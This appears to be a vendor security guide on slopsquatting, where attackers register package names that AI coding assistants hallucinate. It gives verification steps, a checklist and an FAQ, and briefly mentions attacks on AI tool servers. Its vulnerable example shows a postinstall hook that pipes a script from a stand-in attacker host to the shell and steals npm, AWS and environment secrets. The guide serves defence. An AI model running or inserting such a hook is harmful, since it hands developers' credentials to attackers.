Hallucinated package names in AI-generated code — detect, prevent, and recover
AI coding assistants invent plausible-sounding package names that don't exist — and attackers pre-register those hallucinated names on npm and PyPI with malware. This guide shows the attack, the verification workflow, and the production controls that defend against it.
If you have ever pasted an `npm install` or `pip install` command from an AI coding assistant without checking the registry first, you have run the slopsquatting attack on yourself. AI models hallucinate package names confidently — Socket and Snyk's 2024-2025 research puts the hallucination rate between 5% and 20%, depending on language and prompt. Attackers monitor common LLM hallucinations and pre-register the names with malicious payloads. This guide walks through the attack, the one-minute verification workflow that defeats it, and the build-time controls that catch it before merge.
What it is
Slopsquatting is the supply-chain class where an AI coding assistant suggests a package that does not exist; an attacker has registered the hallucinated name on the registry; the developer copy-pastes the install command and pulls malware. Distinct from typosquatting (which mimics an existing real package). The 2025 origin post by Seth Larson named the class. The defense is a combination of name verification, build-time scanning, and a private mirror or allow-list for production.
Vulnerable example
# Vulnerable workflow — copy-paste from AI without verification
$ # User: "add a JWT helper for verifying tokens in Express"
$ # AI assistant: "Run: npm install jwt-helper-utils"
$ npm install jwt-helper-utils
# npm warn deprecated jwt-helper-utils@1.0.3 ...
# added 1 package in 4s
#
# postinstall hook fires:
# curl -s https://attacker.example/x | sh
# # exfiltrates ~/.npmrc + ~/.aws/credentials + .envFixed example
# Fixed workflow — verify every AI-suggested package against the registry
$ # AI assistant suggests: npm install jwt-helper-utils
# Step 1: Does the package actually exist?
$ npm view jwt-helper-utils
# npm error 404 'jwt-helper-utils@*' is not in this registry.
# -> Hallucinated. Reject the suggestion.
# If the package DOES exist, verify before installing:
# Step 2: Check first-publish date + downloads + repo
$ npm view jsonwebtoken time.created versions[0] downloads.weekly repository.url
# 2012-09-19T16:21:51.621Z
# 0.1.0
# (look up weekly downloads on npmjs.com/package/<name>)
# git+https://github.com/auth0/node-jsonwebtoken.git
# Step 3: Verify publisher matches the canonical maintainer
$ npm owner ls jsonwebtoken
# auth0 <devops@auth0.com>
# Step 4: Pin the verified package explicitly
$ npm install jsonwebtoken@^9.0.0 --save-exact
# Build-time control - Socket / Securie scan blocks PRs
# whose new dependencies are <30 days old + low downloads + no GitHub repoHow Securie catches it
apps/web/app/api/route.ts:22Hallucinated package names in AI-generated code
Securie's dependency-vuln specialist runs on every PR. For each newly-added package in package.json / requirements.txt / Gemfile, the specialist queries the registry for first-publish-date, weekly download count, GitHub repo link, and publisher identity. Packages first-published <30 days ago with low download counts AND no linked GitHub repo trip the slopsquatting heuristic. The PR comment names the suspect package, lists the canonical alternative the AI was likely hallucinating, and proposes a one-tap rewrite of the install command. The verification runs in the sandbox so a malicious post-install never executes on Securie infrastructure either.
# Fixed workflow — verify every AI-suggested package against the registry
$ # AI assistant suggests: npm install jwt-helper-utils
# Step 1: Does the package actually exist?
$ npm view jwt-helper-utils
# npm error 404 'jwt-helper-utils@*' is not in this registry.
# -> Hallucinated. Reject the suggestion.
# If the package DOES exist, verify before installing:
# Step 2: Check first-publish date + downloads + repo
$ npm view jsonwebtoken time.created versions[0] downloads.weekly repository.url
# 2012-09-19T16:21:51.621Z
# 0.1.0
# (look up weekly downloads on npmjs.com/package/<name>)
# git+https://github.com/auth0/node-jsonwebtoken.git
# Step 3: Verify publisher matches the canonical maintainer
$ npm owner ls jsonwebtoken
# auth0 <devops@auth0.com>
# Step 4: Pin the verified package explicitly
$ npm install jsonwebtoken@^9.0.0 --save-exact
# Build-time control - Socket / Securie scan blocks PRs
# whose new dependencies are <30 days old + low downloads + no GitHub repoChecklist
- Every AI-suggested package is verified against the registry before installation (`npm view <name>` / `pip index versions <name>`)
- New dependencies in PRs are reviewed: first-publish date, weekly downloads, GitHub repo link, publisher identity
- Production builds use a private mirror or allow-list registry, not the public npm/PyPI directly
- package.json / requirements.txt / Gemfile pin exact versions for security-critical dependencies
- Lockfile is committed and reviewed in PRs (package-lock.json, yarn.lock, poetry.lock, Pipfile.lock)
- Post-install / post-merge scripts are disabled in CI for untrusted PRs (`--ignore-scripts`)
- Secrets and credentials are not readable by post-install hooks (use isolated CI runners)
- Dependency review is automated on every PR (Securie / Socket / GitHub Dependency Review)
FAQ
How often does this actually happen?
Socket and Snyk research from 2024-2025 measured 5-20% of AI-suggested package names as hallucinated, with rates higher for Python (PyPI's namespace is fragmented) than for npm. The first proven malicious slopsquatting registrations on npm and PyPI were reported through 2024-2025; counts in the wild grew through 2026.
Doesn't `npm audit` catch this?
No. `npm audit` checks installed packages against a known-vulnerable database. Slopsquatting packages are zero-day attacks — they're not in any vuln DB until reported, and by then your secrets are already exfiltrated. The defense is preventive (verify before install) plus build-time scanning (Securie / Socket).
What if the AI gives me a real but malicious typosquat?
Same defense applies — verify first-publish date, weekly downloads, publisher, and GitHub repo. Typosquats usually fail one or more of those checks (a fresh npm package called `lodahs` with 5 downloads/week and no repo is not the real lodash).
Is this only an AI problem?
Slopsquatting specifically is AI-driven — the attacker exploits the AI's confidence in inventing names. The broader registry-poisoning problem (typosquats, dependency-confusion, malicious transitives) predates AI, but AI dramatically widened the surface by inventing fresh names every prompt.
Related guides
Vibe-coded apps inherit thousands of transitive dependencies and the AI assistant invents fresh ones every prompt. This guide walks through the dependency-scanning stack for an AI-built app: what to run, what to block in CI, and how to handle slopsquatting + typosquatting + dependency confusion.
Cursor / Lovable / Bolt / Copilot wrote your code. It compiles, it works, you shipped it. Before you do the same thing tomorrow, here are the 5 security patterns AI-generated code gets wrong, with the visual signature for each so you can spot them in code review.
Model Context Protocol went 0 → 200,000+ servers in 9 months. The April 2026 Anthropic RCE flaw + the Invariant Labs tool-poisoning class disclosures forced every MCP-using team to harden their server hygiene. This guide walks the four attack classes (unknown-server smuggle, fingerprint drift, tool smuggle, scope escalation) and the operator-authored TOML catalog that closes them.
The rug-pull pattern: an MCP server ships a safe v1 catalog at install time, then mutates to a v2 catalog (with attacker-controlled tools) once it's running in your trust boundary. Invariant Labs disclosed this class in 2025; the Apr 2026 Anthropic RCE incident exploited a related design flaw. This guide ships the fingerprint-pinning + signature-verification defense.